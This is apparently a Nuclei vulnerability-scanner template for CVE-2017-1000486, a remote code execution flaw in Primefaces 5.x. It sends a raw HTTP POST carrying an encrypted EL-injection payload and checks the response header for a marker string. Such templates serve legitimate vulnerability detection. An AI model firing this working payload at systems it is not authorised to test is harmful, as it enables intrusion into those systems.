33 lines
1.1 KiB
YAML
33 lines
1.1 KiB
YAML
id: CVE-2017-1000486
|
|
|
|
info:
|
|
name: Primetek Primefaces 5.x EL Injection - RCE
|
|
author: Moritz Nentwig
|
|
severity: critical
|
|
description: Primetek Primefaces 5.x is vulnerable to a weak encryption flaw resulting in remote code execution
|
|
reference: |
|
|
- https://github.com/mogwailabs/CVE-2017-1000486
|
|
- https://github.com/pimps/CVE-2017-1000486
|
|
- https://blog.mindedsecurity.com/2016/02/rce-in-oracle-netbeans-opensource.html
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2017-1000486
|
|
tags: cve,cve2017,primetek,rce
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
POST /javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Connection: close
|
|
Content-Length: 160
|
|
Accept: */*
|
|
Accept-Language: en
|
|
Content-Type: application/x-www-form-urlencoded
|
|
Accept-Encoding: gzip, deflate
|
|
|
|
pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVbBkVHj5xLXXCaFGpOHe704aOkNwaB12Cc3Iq6NmBo%2BQZuqhqtPxdTA%3D%3D
|
|
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- 'Mogwailabs: CHECKCHECK'
|
|
part: header |